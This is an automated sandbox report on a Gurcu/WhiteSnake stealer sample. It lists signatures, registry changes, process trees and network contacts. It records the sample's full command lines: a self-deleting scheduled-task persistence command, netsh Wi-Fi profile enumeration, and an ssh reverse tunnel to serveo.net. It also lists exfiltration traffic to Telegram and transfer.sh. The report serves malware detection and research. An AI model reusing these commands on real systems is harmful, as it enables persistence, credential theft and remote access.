Malware Analysis Report

2024-10-19 06:43

Sample ID 230913-tq9vmagb22
Target Vfd663501e1ac13eb331505b8388e675450.exe
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
Tags
gurcu collection discovery spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5

Threat Level: Known bad

The file Vfd663501e1ac13eb331505b8388e675450.exe was found to be: Known bad.

Malicious Activity Summary

gurcu collection discovery spyware stealer

Detect Gurcu Stealer V3 payload

Gurcu, WhiteSnake

Gurcu family

Reads user/profile data of web browsers

Deletes itself

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Looks up external IP address via web service

Checks installed software on the system

Accesses Microsoft Outlook profiles

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

outlook_win_path

outlook_office_path

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Runs ping.exe

Modifies system certificate store

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-13 16:16

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A

Gurcu family

gurcu

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-13 16:16

Reported

2023-09-13 16:20

Platform

win7-20230831-en

Max time kernel

146s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 2984 wrote to memory of 2332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2984 wrote to memory of 2332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2984 wrote to memory of 2332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2984 wrote to memory of 2016 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2984 wrote to memory of 2016 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2984 wrote to memory of 2016 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2984 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2984 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2984 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2984 wrote to memory of 2880 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2984 wrote to memory of 2880 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2984 wrote to memory of 2880 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2880 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2880 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2880 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2616 wrote to memory of 2492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2616 wrote to memory of 2492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2616 wrote to memory of 2492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2616 wrote to memory of 1824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2616 wrote to memory of 1824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2616 wrote to memory of 1824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2616 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2616 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2616 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2880 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2880 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2880 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 1428 wrote to memory of 1588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1428 wrote to memory of 1588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1428 wrote to memory of 1588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1428 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1428 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1428 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1428 wrote to memory of 1076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1428 wrote to memory of 1076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1428 wrote to memory of 1076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2880 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2880 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2880 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2880 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2100 wrote to memory of 1808 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2100 wrote to memory of 1808 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2100 wrote to memory of 1808 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 1808 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 1808 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 1808 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 1100 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1100 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1100 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1100 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1100 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1100 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1100 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1100 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1100 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1808 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 1808 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 1808 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2028 wrote to memory of 1600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2028 wrote to memory of 1600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2028 wrote to memory of 1600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe

"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6298 serveo.net

C:\Windows\system32\taskeng.exe

taskeng.exe {20093F4E-FC6E-41BE-819B-328F0E8BE865} S-1-5-21-3513876443-2771975297-1923446376-1000:GPFFWLPI\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6298 serveo.net

Network

Country Destination Domain Proto
N/A 127.0.0.1:6298 tcp
US 8.8.8.8:53 github.com udp
US 140.82.112.3:443 github.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 serveo.net udp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 api.telegram.org udp
FR 51.77.200.232:8080 51.77.200.232 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
N/A 127.0.0.1:6298 tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.121.146:80 apps.identrust.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
DE 144.76.136.153:443 transfer.sh tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
